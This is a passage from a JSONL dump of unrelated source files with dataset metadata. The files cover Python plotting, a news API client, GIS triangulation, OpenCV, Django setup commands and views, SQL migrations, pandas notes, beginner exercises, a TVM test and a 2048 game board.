= las.predict([xmax, 1])\nplt.plot([xmin, xmax], [y0, y1], '-', lw = 4)\nplt.savefig('figure7_3.png', dpi = 150)\n\n","sub_path":"Chapter07_1/figure7_3.py","file_name":"figure7_3.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"53720668","text":"import urllib.request,json\nfrom .models import news\nfrom app import app\n\nNews = news.News\nSource = news.Source\n# global api_key,source_base_url,articles_base_url\napi_key = app.config['NEWS_API_KEY']\nsource_base_url = app.config['NEWS_SOURCES_BASE_URL']\nnews_base_url = app.config['NEWS_API_BASE_URL']\n\ndef get_sources(category):\n '''Function that gets json response to our url request'''\n get_sources_url = source_base_url.format(category,api_key)\n print(get_sources_url)\n with urllib.request.urlopen(get_sources_url) as url:\n get_sources_data = url.read()\n get_sources_response = json.loads(get_sources_data)\n\n source_results = None\n\n if get_sources_response['sources']:\n source_results_list = get_sources_response['sources']\n source_results = process_results(source_results_list)\n print(source_results)\n return source_results\n\ndef process_results(source_list):\n '''\n Function that processes the source result and transform to a list of objects\n Args:\n source_list: A list of dictionaries that contain news sources\n Returns:\n source_results: A list of source objects\n '''\n source_results = []\n for source_item in source_list:\n id = source_item.get('id')\n name = source_item.get('name')\n description = source_item.get('description')\n\n source_object = Source(id,name,description)\n source_results.append(source_object)\n\n return source_results\n\ndef get_news(id):\n '''Function thet gets the json response to our url request'''\n get_news_url = news_base_url.format(id)\n print(get_news_url)\n\n with urllib.request.urlopen(get_news_url) as url:\n get_news_data = url.read()\n get_news_response = json.loads(get_news_data)\n\n news_results = None\n\n if get_news_response['articles']:\n news_results_list = get_news_response['articles']\n news_results = process_articles(news_results_list)\n\n return news_results\n\ndef process_articles(news_list):\n '''\n Function that processes the news result and transforms them to a list of objects\n Args:\n news_list: a list of dictionaries that contain articles\n Returns:\n news_results: a list of news objects\n '''\n news_results = []\n for news_item in news_list:\n title = news_item.get('title')\n author= news_item.get('author')\n description = news_item.get('description')\n url = news_item.get('url')\n urlToImage = news_item.get('urlToImage')\n publishedAt = news_item.get('publishedAt')\n content = news_item.get('content')\n if urlToImage:\n news_object = News(title,author,description,url,urlToImage,publishedAt,content)\n news_results.append(news_object)\n\n return news_results\n\n# def process_articles(news_list):\n# # print(news_list)\n# '''\n# Function that processes the movie result and transform them to a list of Objects\n# Args:\n# news_list: A list of dictionaries that contain news details\n# Returns :\n# news_articles: A list of news objects\n# '''\n# news_articles = []\n# for news_item in news_list:\n# author=news_item.get('author')\n# title = news_item.get('title')\n# description= news_item.get('description')\n# url = news_item.get('url')\n# urlToImage = news_item.get('urlToImage')\n# publishedAt = news_item.get('publishedAt')\n# content= news_item.get('content')\n\n# news_object = News(author,title,description,url,urlToImage,publishedAt,content)\n# news_articles.append(news_object)\n \n# return news_articles\n\ndef search_news(news_id):\n search_news_url = 'https://newsapi.org/v2/everything?api_key={}&query={}'.format(api_key,news_id)\n \n with urllib.request.urlopen(search_news_url) as url:\n search_news_data = url.read()\n search_news_response = json.loads(search_news_data)\n\n search_news_articles = None\n\n if search_news_response['articles']:\n search_news_list = search_news_response['articles']\n search_news_articles = process_articles(search_news_list)\n\n\n return search_news_articles\n","sub_path":"app/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"75504654","text":"# -*- coding: utf-8 -*-\n# @StartTime : 2017/4/13 16:17\n# @EndTime : 2017/4/15 13:30\n# @Author : Andy\n# @File : Qizhong0413.py\n# @Software : PyCharm\n# 1. 请写一个程序,利用第二章的stations.shp点文件生成一个TIN三角网,并存为Shape文件。目的:巩固OGR矢量文件读写知识,自学scipy.spatial模块的Delaunay类。\n# 提交要求:Python源码、Matplotlib生成的结果图片。\n\n\nfrom osgeo import ogr\nfrom osgeo import gdal\nimport numpy as np\nfrom scipy.spatial import Delaunay\nimport matplotlib.pyplot as plt\nimport os\nfrom gwp_shape import SHAPE\n\n# 读取文件\n\n# 为了支持中文路径,请添加下面这句代码\ngdal.SetConfigOption(\"GDAL_FILENAME_IS_UTF8\", \"NO\")\n# 为了使属性表字段支持中文,请添加下面这句\ngdal.SetConfigOption(\"SHAPE_ENCODING\", \"\")\n# 注册所有的驱动\nogr.RegisterAll()\n\nfilename=\"stations.shp\"\nds=ogr.Open(filename,False)\nlayer=ds.GetLayer(0)\n\nspatialref=layer.GetSpatialRef()\n# print spatialref\nlydefn=layer.GetLayerDefn()\ngeomtype=lydefn.GetGeomType()\n# print geomtype\n\nfieldlist = [] #字段列表 (字段类型,OFTInteger, OFTReal, OFTString, OFTDateTime)\nfor i in range(lydefn.GetFieldCount()):\n fddefn = lydefn.GetFieldDefn(i)\n fddict = {'name':fddefn.GetName(),'type':fddefn.GetType(),\n 'width':fddefn.GetWidth(),'decimal':fddefn.GetPrecision()}\n fieldlist += [fddict]\n# print fieldlist\n\ngeomlist, reclist = [], [] #SF 数据记录 – 几何对象及其对应属性\nfeature = layer.GetNextFeature() #获得第一个 SF\nwhile feature is not None:\n geom = feature.GetGeometryRef()\n geomlist += [geom.ExportToWkt()]\n rec = {}\n for fd in fieldlist:\n rec[fd['name']] = feature.GetField(fd['name'])\n reclist += [rec]\n feature = layer.GetNextFeature()\n# print geomlist\n# print \"cut\"\n# print reclist\n\npoints = np.zeros((len(geomlist),2),dtype=np.float)\nfor i in range(len(reclist)): #将 SF 数据记录(几何对象及其属性写入图层)\n geom = ogr.CreateGeometryFromWkt(geomlist[i])\n points[i,0],points[i,1] = geom.GetX(),geom.GetY()\nds.Destroy()\n# print points.shape\n\n# 生成TIN\n\ntri = Delaunay(points)\ndelaunay=tri.simplices.copy() #各三角形索引 0-174\n\nplt.triplot(points[:, 0], points[:, 1], tri.simplices.copy()) # 绘制三角格网\nplt.plot(points[:, 0], points[:, 1], 'o') # 绘制这些离散点\nplt.xlim(00000, 1000000)\nplt.ylim(00000, 1000000)\nplt.show()\n\n\n# 写入points,形式Polygon\noutputfile=\"TIN_stations.shp\"\nshape_driver=SHAPE()\ngeomtypeo=ogr.wkbPolygon\nfieldlisto_ = [{'width': 20, 'decimal': 0, 'type': ogr.OFTInteger, 'name': 'ID'},\n {'width': 20, 'decimal': 3, 'type': ogr.OFTReal, 'name': 'AREA'},\n {'width': 20, 'decimal': 3, 'type': ogr.OFTReal, 'name': 'ANN_PREC'}\n ]\ngeomlist_,reclist_=[],[]\n# print 'cut3'\nfor i in range(len(delaunay)):\n if len(delaunay[i])==0:\n continue\n if -1 in delaunay[i]:\n continue\n coords=[]\n for j in delaunay[i]:\n x,y=points[j,0],points[j,1]\n coords.append(\"%f %f\"%(x,y))\n coords.append(\"%f %f\"%(points[delaunay[i][0],0],points[delaunay[i][0],1]))\n wkt_ = \"POLYGON ((%s))\"%(','.join(coords))\n rec_={}\n rec_['ID']=i\n rec_['AREA']=ogr.CreateGeometryFromWkt(wkt_).GetArea()\n rec_['ANN_PREC']=0.0\n geomlist_.append(wkt_)\n reclist_.append(rec_)\n# print reclist_\n# print geomlist_\nshape_driver.write_shp(outputfile,spatialref,geomtypeo,geomlist_,fieldlisto_,reclist_)\n","sub_path":"PythonGIS/Python空间数据处理期中作业/Qizhong0413.py","file_name":"Qizhong0413.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"487074272","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport cv2\nimport time\nlopp = 0\n# Open the camera\ncap = cv2.VideoCapture(0)\nwhile True:\n # Read the image from the camera\n algus = time.time()\n kulunud_aeg = algus - lopp\n fps = 1 / kulunud_aeg\n lopp = algus\n \n ret, frame = cap.read()\n \n # Write some text onto the frame\n \n\n # Show this image on a window named \"Original\"\n\n \n\n \n cv2.putText(frame, str(int(fps)), (5, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)\n cv2.imshow('Original', frame)# Quit the program when 'q' is pressed\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\nprint('closing program')\ncap.release()\ncv2.destroyAllWindows()\n\n","sub_path":"lab05/raske2.py","file_name":"raske2.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"589405782","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/bee/Dev/piu/django/testSite/bee_django_mission/management/commands/init_mission_type.py\n# Compiled at: 2018-06-05 02:54:47\n__author__ = 'zhangyue'\nimport os, datetime, urllib2, json\nfrom django.core.management.base import BaseCommand, CommandError\nfrom bee_django_mission.models import ContentType, MissionType, Line, Stage\n\nclass MissionTypeData:\n mission_type_list = [\n {'id': 0, \n 'name': '直播时长', \n 'field_name': 'duration', \n 'conditions': 'status:1', \n 'aggragate_type': 2, \n 'comparison_type': 1, \n 'timestamp_field': 'start_time', \n 'operator_type': 1, \n 'link_url': '/custom_course/user_live/', \n 'link_name': '去直播'},\n {'id': 1, \n 'name': '转介人数', \n 'field_name': 'id', \n 'conditions': 'level:3', \n 'aggragate_type': 1, \n 'comparison_type': 1, \n 'timestamp_field': 'created_at', \n 'operator_type': 0, \n 'link_url': '', \n 'link_name': ''},\n {'id': 2, \n 'name': '考级通过', \n 'field_name': 'id', \n 'conditions': 'status:1', \n 'aggragate_type': 1, \n 'comparison_type': 1, \n 'timestamp_field': None, \n 'operator_type': 0, \n 'link_url': '', \n 'link_name': ''},\n {'id': 3, \n 'name': '直播天数', \n 'field_name': 'start_time', \n 'conditions': 'status:1', \n 'aggragate_type': 3, \n 'comparison_type': 1, \n 'timestamp_field': 'start_time', \n 'operator_type': 0, \n 'link_url': '/custom_course/user_live/', \n 'link_name': '去直播'},\n {'id': 4, \n 'name': '完成课程课件', \n 'field_name': 'id', \n 'conditions': 'finished_at__isnull:False', \n 'aggragate_type': 1, \n 'comparison_type': 1, \n 'timestamp_field': None, \n 'operator_type': 0, \n 'link_url': '/course/user_course/', \n 'link_name': '去学习'}]\n content_type_list = [\n {'app_label': 'bee_django_course', \n 'model': 'UserLive', \n 'user_field': 'user', \n 'info': '课程-习琴记录表', \n 'mission_list': [\n mission_type_list[0], mission_type_list[3]]},\n {'app_label': 'bee_django_crm', \n 'model': 'PreUser', \n 'user_field': 'referral_user', \n 'info': 'crm-转介记录表', \n 'mission_list': [\n mission_type_list[1]]},\n {'app_label': 'bee_django_exam', \n 'model': 'UserExamRecord', \n 'user_field': 'user', \n 'info': '考级-考级记录表', \n 'mission_list': [\n mission_type_list[2]]},\n {'app_label': 'bee_django_course', \n 'model': 'UserCourseSection', \n 'user_field': 'user_course__user', \n 'info': '课程-学生学习课件表', \n 'mission_list': [\n mission_type_list[4]]}]\n\n\nclass lineDate:\n line_list = [\n {'name': '里程碑', 'line_type': 1, \n 'auto_finish': 0, \n 'auto_start': 1},\n {'name': '周任务', 'line_type': 2, \n 'auto_finish': 1, \n 'auto_start': 0}]\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n self.init_mission_type()\n self.init_line()\n self.init_stage()\n\n def init_line(self):\n line_list = lineDate.line_list\n for line in line_list:\n self.save_line(line)\n\n def save_line(self, line):\n name = line['name']\n line_type = line['line_type']\n auto_finish = line['auto_finish']\n auto_start = line['auto_start']\n try:\n l = Line.objects.get(name=name)\n except:\n l = Line()\n l.name = name\n l.line_type = line_type\n l.auto_finish = auto_finish\n l.auto_start = auto_start\n l.save()\n\n return l\n\n def init_stage(self):\n stage_name = '本周任务'\n try:\n l = Line.objects.get(line_type=2)\n except:\n return\n\n try:\n Stage.objects.get(name=stage_name)\n return\n except:\n pass\n\n stage = Stage()\n stage.name = stage_name\n stage.level = 1\n stage.line = l\n stage.save()\n return stage\n\n def init_mission_type(self):\n content_type_list = MissionTypeData.content_type_list\n for content_type in content_type_list:\n ct = self.save_content_type(content_type)\n mission_list = content_type['mission_list']\n for mission_type in mission_list:\n self.save_mission_type(mission_type, ct)\n\n def save_content_type(self, content_type):\n app_label = content_type['app_label']\n model = content_type['model']\n user_field = content_type['user_field']\n info = content_type['info']\n try:\n ct = ContentType.objects.get(app_label=app_label, model=model)\n except:\n ct = ContentType()\n ct.app_label = app_label\n ct.model = model\n ct.user_field = user_field\n ct.info = info\n ct.save()\n\n return ct\n\n def save_mission_type(self, mission_type, ct):\n name = mission_type['name']\n field_name = mission_type['field_name']\n conditions = mission_type['conditions']\n aggregate_type = mission_type['aggragate_type']\n comparison_type = mission_type['comparison_type']\n timestamp_field = mission_type['timestamp_field']\n operator_type = mission_type['operator_type']\n link_url = mission_type['link_url']\n link_name = mission_type['link_name']\n try:\n mt = MissionType.objects.get(name=name)\n except:\n mt = MissionType()\n\n mt.name = name\n mt.field_name = field_name\n mt.conditions = conditions\n mt.aggregate_type = aggregate_type\n mt.comparison_type = comparison_type\n mt.timestamp_field = timestamp_field\n mt.operator_type = operator_type\n mt.content_type = ct\n mt.link_name = link_name\n mt.link_url = link_url\n mt.save()\n return mt","sub_path":"pycfiles/bee-django-mission-0.1.12.tar/init_mission_type.py","file_name":"init_mission_type.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"154605921","text":"from datetime import datetime\nfrom rsm_lib.database.common import Session\nfrom rsm_lib.database.models import MIGRATION_STATES\nfrom sqlalchemy.exc import OperationalError, ProgrammingError\nfrom rsm_lib.common import logger\nfrom rsm_lib.migration_lib.migration_parser import MigrationParser, MigrationSteps\n\n\nclass MigrationRunner:\n modes = ['up', 'down']\n\n def __init__(self, migration):\n self.db_session = Session()\n self.migration = migration\n\n def run(self, mode):\n\n # validate that we have passed a proper mode of operation\n if mode not in self.modes:\n raise ValueError(f'mode must be set to either up or down, not {mode}')\n\n parser = MigrationParser(self.migration.file_name)\n parsed_migration = parser.get_parsed_migration_from_file()\n\n base_path = parser.migration_path / mode\n steps = None\n\n if mode == 'up':\n steps = MigrationSteps(parsed_migration.up_steps)\n\n if mode == 'down':\n steps = MigrationSteps(parsed_migration.down_steps)\n\n steps_executed = []\n exception = ''\n\n for step in steps:\n\n search_path = base_path / step\n sql = search_path.read_text()\n\n try:\n logger.info(f\"running command {sql}\")\n\n self.db_session.execute(sql)\n self.db_session.commit()\n steps_executed.append(step)\n\n except OperationalError as e:\n logger.exception('An Operational Exception has occurred. Check logs.')\n self.db_session.rollback()\n exception = str(e)\n break\n\n except ProgrammingError as e:\n logger.exception('A programming error has occurred. Check logs.')\n self.db_session.rollback()\n exception = str(e)\n break\n\n self.migration.exception = exception\n self.migration.last_run_at = datetime.now()\n self.migration.steps_executed = str(steps_executed)\n\n if exception:\n\n if mode == 'up':\n self.migration.state = MIGRATION_STATES.applied_up_fail.value\n self.migration.state_name = MIGRATION_STATES.applied_up_fail.name\n\n if mode == 'down':\n self.migration.state = MIGRATION_STATES.applied_down_fail.value\n self.migration.state_name = MIGRATION_STATES.applied_down_fail.name\n\n else: # otherwise success\n\n if mode == 'up':\n self.migration.state = MIGRATION_STATES.applied_up_success.value\n self.migration.state_name = MIGRATION_STATES.applied_up_success.name\n\n if mode == 'down':\n self.migration.state = MIGRATION_STATES.applied_down_success.value\n self.migration.state_name = MIGRATION_STATES.applied_down_success.name\n\n self.db_session.add(self.migration)\n self.db_session.commit()\n\n\ndef run_migration_up(migration):\n runner = MigrationRunner(migration)\n runner.run('up')\n\n\ndef run_migration_down(migration):\n runner = MigrationRunner(migration)\n runner.run('down')\n","sub_path":"rsm_lib/migration_lib/migration_runner.py","file_name":"migration_runner.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"384163378","text":"import pandas as pd\r\n\r\n\r\n\r\n##LIST OF OPERATIONS(only few impotant once are mentioned, rest all google= 'pandas series operations')\r\n##1.creating a dataframe\r\n##2.opening a pre existing csv file\r\n##3.rows and columns\r\n##4.selectively printing rows and columns\r\n##5.data type of columns\r\n##6.MAX and MIN\r\n##7.MEAN\r\n##8.standard deviation\r\n##9.describe: gives all the stats like count,max,min,mean,std....\r\n##10.conditions\r\n###11.to set index(nos: 0,1,2,3..)\r\n##12.to get a particular row on the basis of the new index\r\n##13.filling Nan\r\n\r\n\r\n\r\n\r\n#1.create dataframe\r\nwether_data={\r\n 'day': ['1/1/2017','1/2/2017','1/3/2017'],\r\n 'temperature': [32,34,26],\r\n 'windspeed': [3,4,7],\r\n 'event': ['Rain','sunny','snow']\r\n }\r\ndf=pd.DataFrame(wether_data)#convert this to a pandas dataframe\r\n#print(df)\r\n\r\n#2.opening a pre existing csv file\r\ndf1=pd.read_csv('nyc_weather.csv')\r\n\r\n#3.rows and columns\r\nrows,columns=df1.shape\r\n#print(rows,columns)\r\n\r\n#4.if we want to print only first n rows do df.head(n)\r\n#print(df1.head(4))\r\n\r\n#4.if we want to print only last n rows do df.tail(n)\r\n#print(df1.tail(4))\r\n\r\n#4.to print few selective rows\r\n#print(df1[2:5])#prints 2,3,4\r\n\r\n#4.to print the name of all the columns\r\n#print(df.columns)\r\n\r\n#4.to print a particular column\r\n#print(df.day)# or also df['day'] but ['wind speed'] if spaces are there then we have to use only this type\r\n\r\n#4.to print selective columns\r\n#print(df[['event','day','temperature']])\r\n\r\n#5.ype of columns\r\n#print(type(df['event']))# it is always SERIES\r\n\r\n#6.MAX and MIN\r\n#print(df['temperature'].min())\r\n\r\n#7.MEAN\r\n#print(df['temperature'].mean())\r\n\r\n#8.standard deviation\r\n#print(df['temperature'].std())\r\n\r\n#9.describe\r\n#print((df.describe())\r\n\r\n\r\n#10.conditionally select data\r\n#print(df[df['temperature']>=32])\r\n#print(df[df['temperature']==df.temperature.max()])\r\n\r\n#11.to set index(nos: 0,1,2,3..)\r\n#print(df.index)#prints range\r\n\r\n#print(df.set_index('day'))#column day becomes the index instead of 0,1,2,3..\r\n\r\n#to permanently change the index\r\n#df.set_index('day',inplace=True)\r\n#print(df)\r\n\r\n#12.to get a particular row on the basis of the new index\r\n#print(df.loc['1/1/2017'])\r\n\r\n#to reset index\r\n#df.reset_index(inplace=True)\r\n#print(df)\r\n\r\n#13.filling Nan\r\n#there is a problem with any given data set if it has a unfilled data points.\r\n#it showa Nan, so here Nan doesnt mean =0 but takes some junk value because of which value of AVG comes wrong\r\n#so in order to make all the Nan spaces as 0 do the following\r\ndf1.fillna(0,inplace=True)\r\nprint(df1)#here Nan is replaced by 0\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"pandas prog/1. operations on dataframe.py","file_name":"1. operations on dataframe.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"227221359","text":"from django.http import HttpResponse\nfrom django.template import loader\nfrom . models import TheAlias,TheSymbol,AliasRedo,SymbolRedo\nfrom datetime import datetime\nfrom transfer.models import TheNotes\nfrom transfer.models import Symbols\n\ndef aliasPage(request):\n globalId = request.session['globalId']\n #fetch the exisiting alias,\n # a) yes ->display\n # b) no -> check whether it is in pending approval,\n # in context it would be alias + status\n aliasRes = TheAlias.objects.filter(globalId=globalId)\n if aliasRes:\n template = loader.get_template('theAlias/aliasResult.html')\n #if there is a alias inplace, list all the symbols that have the note which could be manipulated by this alias, excluding the symbol associated with this alias\n #select symbol, owner from ownership0 where owner='jungu002' and symbol not in (select symbol from issuer0 where alias='jungu002');\n alias = aliasRes[0].alias\n symbols = Symbols.objects.raw(\"\"\"\n select symbol,min(id) as id from ownership0 where owner=%s and symbol not in (select symbol from issuer0 where alias=%s) group by symbol\n \"\"\",[alias, alias])\n context = {\n 'alias': alias,\n 'status': 0 ,\n 'symbols': symbols,\n }\n\n if not aliasRes:\n redoCount = len(AliasRedo.objects.filter(globalId=globalId))\n if redoCount == 1:\n template = loader.get_template('theAlias/aliasResult.html')\n context = {\n 'alias': AliasRedo.objects.filter(globalId=globalId)[0].alias,\n 'status': 1,\n 'symbols': [],\n }\n \n if redoCount == 0:\n template = loader.get_template('theAlias/alias.html')\n context = {\n }\n resp = HttpResponse(template.render(context,request))\n resp.set_cookie('aliaspostToken',value='01')\n return resp\n return HttpResponse(template.render(context,request))\n\n##def applyAlias(request):\n## if request.COOKIES['aliaspostToken'] == '01':\n## template = loader.get_template('theAlias/aliasResult.html')\n## globalId = request.session[\"globalId\"]\n## theAlias = AliasRedo(alias=request.POST[\"alias\"], progress=1, setup=datetime.now(), globalId=globalId)\n## theAlias.save()\n## context = {\n## 'alias': theAlias.alias,\n## 'status': 1,\n## 'symbols': [],\n## }\n## resp = HttpResponse(template.render(context, request))\n## resp.set_cookie('aliaspostToken',value='00')\n## return resp\n## return HttpResponse(\"Can't Submit Twice\")\n\n\ndef symbolPage(request):\n globalId = request.session[\"globalId\"]\n count = len(TheSymbol.objects.filter(globalId=globalId))\n if count == 1:\n symbol = TheSymbol.objects.filter(globalId=globalId)[0].symbol\n #load the notes (issued AND NOT transfered)\n notes = TheNotes.objects.raw(\"\"\"select o.id, o.\"noteId\", o.quantity, i.\"globalId\" from issuer0 i, ownership0 o where o.symbol = i.symbol and o.owner = i.alias and i.\"globalId\" = %s\"\"\",[globalId])\n \n context = {\n 'symbol': symbol,\n 'status': 0,\n 'notes': notes,\n }\n template = loader.get_template('theAlias/symbolResult.html')\n return HttpResponse(template.render(context,request))\n if count == 0:\n #check the symbolRedo\n redoCount = len(SymbolRedo.objects.filter(globalId=globalId))\n if redoCount == 1:\n context = {\n 'symbol': SymbolRedo.objects.filter(globalId=globalId)[0].symbol,\n 'status': 1,\n 'notes': [],\n }\n template = loader.get_template('theAlias/symbolResult.html')\n return HttpResponse(template.render(context,request))\n if redoCount == 0:\n context = {\n }\n template = loader.get_template('theAlias/symbol.html')\n resp = HttpResponse(template.render(context, request))\n resp.set_cookie('postToken',value='01')\n return resp\n\n##def applySymbol(request):\n## if request.COOKIES['postToken'] == '01':\n## template = loader.get_template(\"theAlias/symbolResult.html\")\n## globalId = request.session[\"globalId\"]\n##\n## symbol = request.POST[\"symbol\"]\n## redo = SymbolRedo(globalId=globalId, symbol=symbol, setup=datetime.now(), progress=1)\n## redo.save()\n## context = {\n## 'symbol': symbol,\n## 'status': 1,\n## 'notes': [],\n## }\n## resp = HttpResponse(template.render(context, request))\n## resp.set_cookie('postToken', value='00')\n## return resp\n## return HttpResponse(\"Can't Submit Twice\") \n","sub_path":"theAlias/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"324878350","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 17 20:24:37 2020\r\n\r\n@author: PC2\r\n\"\"\"\r\n\r\n#Entrada de datos\r\nKM=float(input('Dame el total de kilómetros por recorrer: '))\r\nTI=str(input('Dame el tipo de autobús, A, B o C: '))\r\nNPR=int(input('Dame el número de personas real: '))\r\n#Procesos\r\nif TI==\"A\":\r\n CK=2\r\nelse:\r\n if TI==\"B\":\r\n CK=2.50\r\n else:\r\n CK=3\r\n if NPR==20:\r\n NP=20\r\n else:\r\n NP=NPR\r\nTO=NPR*CK*KM\r\nCP=TO/NPR\r\n#Salida (Mostrar resultado(s))\r\nprint(f'La persona pagará: {CP}')\r\nprint(f\"El costo del viaje: {TO}\")\r\ninput('Presione enter para continjuar...')\r\n","sub_path":"C/Ejercicio 10.py","file_name":"Ejercicio 10.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"375206751","text":"while True:\n cont = 0\n num = int(input('Digite aqui um número: '))\n if num < 0:\n print('Programa encerrado!')\n break\n while cont <= 10:\n\n print(f'{num} x {cont} = {num * cont}')\n cont += 1","sub_path":"tabuada3.0.py","file_name":"tabuada3.0.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"141301901","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\nimport numpy as np\nimport pytest\n\nimport tvm\nfrom tvm import relay\nfrom tvm.relay import transform\n\ndef test_basic():\n mod = relay.Module()\n x2 = relay.var('x2', shape=(10, 5))\n y2 = relay.var('y2', shape=(1, 5))\n level2_func = relay.Function([x2, y2], relay.op.add(x2, y2))\n\n x1 = relay.var('x1', shape=(10, 5))\n y1 = relay.var('y1', shape=(1, 5))\n level1_func = relay.Function([x1, y1], level2_func(x1, y1))\n\n mod[\"main\"] = level1_func\n new_mod = transform.LambdaLift()(mod)\n assert len(new_mod.functions) == 2\n\nif __name__ == \"__main__\":\n pytest.main()\n\n","sub_path":"third_party/incubator-tvm/tests/python/relay/test_pass_lambda_lift.py","file_name":"test_pass_lambda_lift.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"602344627","text":"#使用递归方法来实现斐波那契数列\n\nprint(\"使用递归方法实现斐波那契数列\")\nnum=int(input(\"输出斐波那契数列的前多少项:\"))\n\ndef Fibonacci(n):\n if n<=1:\n return n\n else:\n return Fibonacci(n-1)+Fibonacci(n-2)\n\nprint(\"斐波那契数列如下:\")\n\nfor i in range(0,num):\n print(Fibonacci(i),end=\" \")","sub_path":"25_递归的斐波那契数列.py","file_name":"25_递归的斐波那契数列.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"77021706","text":"import numpy as np\nfrom enum import Enum\nfrom zope.event import notify\n\nclass GameStates(Enum):\n WIN = 1\n LOSE = 2\n IN_PROGRESS = 3\n\nclass GameActions(Enum):\n UP = 0\n DOWN = 1\n LEFT = 2\n RIGHT = 3\n\nclass OnBoardChanged():\n def __init__(self, board):\n self.board = board\n\nclass GameBoard():\n def __init__(self, n, max_tile=2048):\n self.n = n\n self.max_tile = max_tile\n self.board = np.zeros((n, n), dtype=np.int)\n self._game_state = GameStates.IN_PROGRESS\n self.action_set = set()\n\n self._free_tiles = n ** 2\n self._largest_tile_placed = 2\n self._score = 0\n center = (self.n - 1) / 2\n self.bonus_mask = np.array([(i - center) * (j - center) for i in range(self.n) for j in range(self.n)]).reshape(self.n, self.n)\n self.bonus_mask = np.abs(self.bonus_mask) / np.max(self.bonus_mask)\n\n self.add_tile(value=2)\n self.add_tile(value=2)\n self.on_board_updated()\n\n def __getitem__(self, item):\n return self.board[item]\n\n @property\n def game_state(self):\n return self._game_state\n\n @property\n def largest_tile_placed(self):\n return self._largest_tile_placed\n\n @property\n def actions(self):\n return self.action_set\n\n @property\n def score(self):\n #return self._score + self._free_tiles\n return self._score\n\n @property\n def free_tiles(self):\n return self._free_tiles\n\n def on_board_updated(self):\n self.update_action_set()\n self.calc_score()\n notify(OnBoardChanged(self))\n\n def update_action_set(self):\n \"\"\"\n Updates the set of available actions that can be taken on this board\n This function iterates over the matrix only once but checks both rows and columns\n for available actions simultaneously by interchanging the indices i,j (exploits the\n fact that the board is always square)\n \"\"\"\n self.action_set.clear()\n\n for i in range(self.n):\n h_zeroSeen, v_zeroSeen, v_digitSeen, h_digitSeen = False, False, False, False\n\n for j in range(self.n):\n if self.board[i][j] >= self.max_tile:\n self._game_state = GameStates.WIN\n self.action_set.clear()\n return\n\n # User can move tiles to the right if first a digit then a zero are seen when moving left-right in a row\n if self.board[i][j] == 0:\n h_zeroSeen = True\n if h_digitSeen: self.action_set.add(GameActions.RIGHT)\n\n # User can move tiles to the left if first a zero then a digit are seen when moving left-right in a row\n if self.board[i][j] != 0:\n h_digitSeen = True\n if h_zeroSeen: self.action_set.add(GameActions.LEFT)\n # If two adjacent horizontal tiles have the same value, either a left or right action can be performed\n if (j < self.n - 1 and self.board[i][j] == self.board[i][j+1]): self.action_set.update([GameActions.LEFT, GameActions.RIGHT])\n\n # User can move tiles down if first a digit then a zero are seen when moving top-bottom in a column\n if self.board[j][i] == 0:\n v_zeroSeen = True\n if v_digitSeen: self.action_set.add(GameActions.DOWN)\n\n # User can move tiles up if first a zero then a digit are seen when moving top-bottom in a column\n if self.board[j][i] != 0:\n v_digitSeen = True\n if v_zeroSeen: self.action_set.add(GameActions.UP)\n # If two adjacent vertical tiles have the same value, either an up or down action can be performed\n if (j < self.n - 1 and self.board[j][i] == self.board[j+1][i]): self.action_set.update([GameActions.UP, GameActions.DOWN])\n\n self._game_state = GameStates.LOSE if len(self.action_set) <= 0 else GameStates.IN_PROGRESS\n\n def add_tile(self, value=None):\n found = False\n while not found:\n i, j = np.random.randint(0, len(self.board), 2)\n found = (self.board[i][j] == 0)\n 